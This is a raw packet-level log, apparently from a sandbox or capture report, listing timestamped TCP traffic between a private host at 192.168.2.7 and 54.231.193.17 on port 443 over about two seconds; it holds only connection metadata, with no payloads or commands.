Dec 12, 2024 17:39:36.866427898 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.866442919 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.866467953 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.866508961 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.866522074 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.866761923 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.867497921 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.873620987 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.873647928 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.873682976 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.873692989 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.873719931 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.879642963 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.879672050 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.879735947 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.879743099 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.879796028 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.885482073 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.885499001 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.885551929 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.885636091 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.885636091 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.885643959 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.885761976 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.891594887 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.891622066 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.891673088 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.891673088 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.891685009 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.891712904 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.898009062 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.898036003 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.898078918 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.898087978 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.898149967 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.904720068 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.904752970 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.904819012 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.904824972 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.904848099 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.904863119 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.904941082 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.910666943 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.910691977 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.910725117 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.910758018 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.910780907 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.910797119 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.960649967 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.062089920 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.062114000 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.062140942 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.062194109 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.062227964 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.062243938 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.068231106 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.068253040 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.068300009 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.068327904 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.068342924 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.074982882 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.075006962 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.075072050 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.075090885 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.075114012 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.080502033 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.080527067 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.080612898 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.080621004 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.086405993 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.086427927 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.086482048 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.086489916 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.086514950 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.091768980 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.091792107 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.091835976 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.091847897 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.091875076 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.097551107 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.097599030 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.097635031 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.097661972 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.097678900 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.103646994 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.103671074 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.103729010 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.103754044 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.103777885 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.163777113 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.255065918 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.255076885 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.255122900 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.255170107 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.255192041 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.255202055 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.255256891 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.261073112 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.261087894 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.261142969 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.261159897 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.261425018 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.267214060 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.267230034 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.267278910 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.267293930 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.267425060 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.273998976 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.274024963 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.274060965 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.274071932 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.274101019 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.274117947 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.278841019 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.278862000 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.278908968 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.278920889 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.278955936 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.284713984 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.284735918 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.284778118 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.284790993 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.284816027 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.284832001 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.290685892 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.290705919 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.290739059 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.290750027 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.290769100 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.290782928 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.297060966 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.297097921 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.297122955 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.297135115 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.297157049 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.297175884 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.447472095 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.447494030 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.447577953 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.447593927 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.447633982 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.447653055 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.453318119 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.453344107 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.453389883 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.453408003 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.453433990 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.453450918 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.459309101 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.459342957 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.459474087 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.459491968 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.459498882 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.459537983 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.465526104 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.465548038 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.465600014 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.465615988 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.465648890 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.465662003 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.470758915 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.470782042 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.470849037 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.470864058 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.470906973 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.477229118 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.477251053 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.477305889 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.477322102 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.477351904 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.477366924 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.482657909 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.482681990 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.482721090 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.482736111 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.482758045 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.482779026 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.489077091 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.489104986 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.489140987 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.489152908 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.489182949 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.489198923 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.640248060 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.640269041 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.640397072 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.640414000 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.640485048 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.645499945 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.645544052 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.645574093 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.645587921 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.645615101 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.645637035 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.651628017 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.651648998 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.651694059 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.651709080 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.651741028 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.651755095 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.657639980 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.657655001 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.657730103 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.657746077 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.659548998 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.662961006 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.662976980 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.663033962 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.663048983 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.663073063 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.663086891 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.669584990 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.669604063 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.669661999 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.669677019 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.669713974 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.674841881 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.674860001 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.674927950 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.674938917 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.674958944 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.674972057 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.826812029 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.826836109 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.826910973 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.826931953 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.826982021 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.831619978 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.831635952 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.831716061 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.831722975 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.831767082 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.837822914 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.837841034 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.837898970 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.837905884 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.837940931 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.837960005 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.843914032 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.843934059 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.843993902 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.844001055 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.844044924 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.849423885 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.849446058 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.849512100 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.849518061 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.849539995 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.849558115 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.855298042 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.855325937 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.855374098 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.855385065 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.855424881 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.861753941 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.861772060 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.861849070 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.861860037 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.861900091 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.867019892 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.867039919 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.867185116 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:37.867201090 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:37.867320061 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.019001007 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.019030094 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.019133091 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.019153118 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.019293070 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.023901939 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.023962975 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.023972988 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.023984909 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.024019003 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.024034023 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.029886007 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.029908895 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.029958963 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.029970884 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.032984972 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.035881996 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.035906076 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.035984993 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.035995960 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.036978960 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.041373968 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.041394949 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.041435003 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.041446924 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.041476011 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.041491032 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.047395945 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.047416925 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.047461987 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.047472000 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.047492027 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.047521114 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.053394079 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.053411007 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.053464890 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.053473949 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.053704023 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.059218884 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.059236050 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.059335947 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.059348106 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.060822964 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.211433887 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.211453915 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.211503029 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.211519957 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.211535931 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.211571932 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.216415882 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.216432095 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.216500998 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.216516972 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.219000101 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.222528934 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.222543955 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.222599983 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.222615957 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.222776890 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.228671074 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.228686094 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.228753090 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.228765965 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.228950977 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.234039068 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.234054089 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.234117985 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.234132051 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.234987974 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.240411997 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.240432024 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.240494013 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.240509987 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.240587950 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:38.246105909 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:38.246121883 CET	443	49770	54.231.193.17	192.168.2.7
